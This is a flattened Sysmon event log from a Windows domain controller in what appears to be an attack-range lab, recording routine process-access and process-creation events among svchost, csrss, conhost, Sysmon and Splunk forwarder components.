10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7D23-5FA1-6801-000000008801}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D23-5FA1-6801-000000008801}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.798{D28789B6-7D23-5FA1-6801-000000008801}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D23-5FA1-6701-000000008801}2552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7D23-5FA1-6701-000000008801}2552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D23-5FA1-6701-000000008801}2552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.125{D28789B6-7D23-5FA1-6701-000000008801}2552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D24-5FA1-6901-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:12.470{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 